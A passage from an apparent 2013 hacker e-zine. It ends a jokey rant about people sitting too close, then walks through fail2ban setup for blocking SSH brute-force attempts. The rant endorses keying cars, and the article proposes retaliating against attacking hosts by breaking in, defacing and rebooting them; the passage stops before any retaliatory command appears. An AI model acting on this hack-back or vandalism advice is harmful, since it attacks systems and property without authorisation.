sit a mere two seats away from you! That my minions, is what I call social herding. All that space and still they have to sit near you, even when you're giving off your best 'I'm a psycho' vibe. Asshats! What prompts this need to congregate I'm told is a in-built, neanderthalic need to survive and how do we survive as a species? Superior numbers, good old group living. This may indeed be the cause but it still pisses me off that these individuals allow themselves to become nothing more than bipedal sheep by not having the self awareness to sit somewhere bloody else! Now, my temper would subside somewhat if I thought for a minute that the only reason these woolly jumpers sat next to me was because I had nabbed the prime viewing position and they were trying to muscle in but this is not the case. To prove this to yourselves I suggest you go for a cinema visit in the near future and choose the absolute worst viewing positions i.e down on the front row, right in the middle and see just how many Dollies Baa their apologies as they squeeze by you for a seat. Obvisouly, for this experiment to work you'll have to choose a less than exceptional film to see so that there are plenty of empty seats but given some of the dross that's on, that shouldn't be too difficult. This phenomena is not limited to the cinema, oh no, it haunts us elsewhere too. Can you guess, yes indeedy, the car park conundrum. Where, oh where, will I park? I know, I'll squeeze in right between that mini and that campervan in my big SUV. And is it because there are no other spaces? No, that's not it. The mini and the campervan are the only two cars in the massive hundred car capacity carpark. Is it because I want to deter thieves? (Although I've never seen the logic in that one, surely more cars just provide the grand theft auto practitioner with good cover from the cameras??) Anyway, that's not it either. Oh no, it's just that I don't want my SUV to be lonley- cars after all are social creatures. Yes, you got it baa baa black sheep has struck again. You are now totally within your rights as a fully independent individual to key the feckers car! I admit that perhaps this might not be viewed as a wholly constructive way to deal with the social herding epidemic but what can I say sometimes a random act of vandalism is the only way to go. So, my minions the moral of this little rant is - watch it on fecking dvd! +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | Proactive Server Defence | +------------------------------------------------------------------------------+ It's always good to look through the good old server logs to see what cretin or bot has tried to get into them. Actually it's a good source of getting access to a compromised machine but that's another story. Anyhow, after looking over reams and reams of failed log in attempts I figured, hell, lets carry out some Google-fu and see what bell-end is attempting to gain access to my k-rad-uber-proxy server. I mean lets face it, it's either a bot, a government or some skid trying to be cool. One day someone came along from IP address 213.248.110.43 and hammered the SSH server to try and gain access, a quick google of the IP address reveals it's a shared host, probably using one of the same passwords that it tried to gain access to the proxy with. So this makes us think, what could we do to prevent such skids attempting it in the future. I mean there's a few options available but we must also look at the situation. The possibilities are: 1) It was an automated bot, merely adding to the noise of the internet and my machine was scanned along with thousands of others and it maybe got into some. 2) It was a direct attack on our network by person or persons unknown. 3) There's nothing in the logs because someone gained access to the system and cleaned up after themselves. Situation 2 and 3 are the most worrying, even if it's most likely situation 1. Now one could go through the logs and run a brute force on the system that carried out the scan. Once in, all web pages could be defaced, scanning bots removed, root password changed and server rebooted. Yes, it would get noticed and cleaned up, a nice flashy colour clashing page that screams beef up your security and stay the fuck away from my servers might be all fun and good but it doesn't really solve the issues, except maybe in the immediate short term. But it doesn't detract away that the host could just have been set up as an attack server to gain access to others. These attack servers crop up every now and then, and trying to get into them in the same fashion that they tried will probably fail. Then there's situation 3, what if they actually got into the server and you never got to see the logs? They could be in there, backdoor the server and leech all of your secret porn stash, even worse, what if they delete it? Going over the logs is good, but if it only shows you who failed to get into the machine, then going over it after the fact can be a little pointless. My plan is to stop them in their tracks. We want to keep an eye open on any attempt to brute force the server or scan it for exploits, not only do I want to keep it out of my server(s) I want to prevent and hinder any other attempts to get into any other system. Ok, so in order to keep our systems secure we will deploy some software to watch out for brute for attacks, in this case we will employ fail2ban which you can download from http://www.fail2ban.org. This nifty bit of kit will monitor log files for brute force attempts and block said offending IP addresses, it does this in real time so you're not waiting on cron jobs to parse the logs. It uses python and doesn't require any other dependencies, although it can optionally use gamin. Most distributions come with it these days, for example, while testing on the pi it's just a case of: sudo apt-get install fail2ban Now it's installed lets mess with the settings and features so we can get alittle nasty with intruders rather than just banning them. First off we want to create a jail. The jails are basically a set of rules that fail2ban looks for and what it does in reaction to those rules being matched. The most obvious and handiest of these is to add the IP address to IPtables and get all packets from the offending IP address dropped. But we're evil so we'll go a little further than that. First step, copy the default jail file for editing: sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local Now we open the file for editing: sudo nano /etc/fail2ban/jail.local Ok head down to the section that is labled default, this is where you will specify IPs that will be ignored. This can be the local IP addess, or if you are on a static then you can set it here too. This is handy if you're a bit of a numpty and forget your password more than a few times. If you have multiple servers then you can add the IP of one in here and use said server to bounce your connection to it if you need to. You will also specify how long you want the offender banned for and how many attempts to log in you will allow. Here is what we have: [DEFAULT] # "ignoreip" can be an IP address, a CIDR mask or a DNS host ignoreip = 127.0.0.1/8 bantime = 18000 maxretry = 3 # "backend" specifies the backend used to get files modification. Available # options are "gamin", "polling" and "auto". # yoh: For some reason Debian shipped python-gamin didn't work as expected # This issue left ToDo, so polling is default backend for now backend = auto # # Destination email address used solely for the interpolations in # jail.{conf,local} configuration files. destemail = root@localhost.com Ok, so we have the local IP address allowed, multiple addesses can be entered and seperated with a space. It's always good to have an IP that you can log into just in case, after all you won't want to set this one off once it's up and running. We have set the ban time for 5 hours, this is a tad on the long side I know, but I like to be sure; 10 minutes may be more than enough. Maxretry speaks for itself, essentially how many retries you will allow for the system to accept, 3 is generally the socially accepted standard. Although if you are paranoid then you can set it to 1, possibly a few more if you wanted to be certain it was a bot or whatnot. Leave backend to auto and enter your email into the destemail to get a nice mail everytime an IP address gets banned - assuming that you've set up a mail server. Now the next section we will look at in the /etc/fail2ban/jail.local file is this part: # # ACTIONS # # Default banning action (e.g. iptables, iptables-new, # iptables-multiport, shorewall, etc) It is used to define # action_* variables. Can be overridden globally or per # section within jail.local file banaction = iptables-multiport # email action. Since 0.8.1 upstream fail2ban uses sendmail # MTA for the mailing. Change mta configuration parameter to mail # if you want to revert to conventional 'mail'. mta = sendmail # Default protocol protocol = tcp [...] Ok this default entry shows us what action will be called once the offender has tried to brute force the server, the banaction = iptables-multiport is referring to the file /etc/fail2ban/action.d/iptables-multiport.conf We will change this to: banaction = hammer Now save it and we'll go make a few more changes to the set up, lets make a copy of the action file and change a few things in there: cd /etc/fail2ban/action.d cp ./iptables-multiport.conf /etc/fail2ban/action.d/hammer.conf nano /etc/fail2ban/action.d/hammer.conf Now look for this bit: # Option: actionban # Notes.: command executed when banning an IP. Take care that the # command is executed with Fail2Ban user rights. # Tags: IP address # number of failures #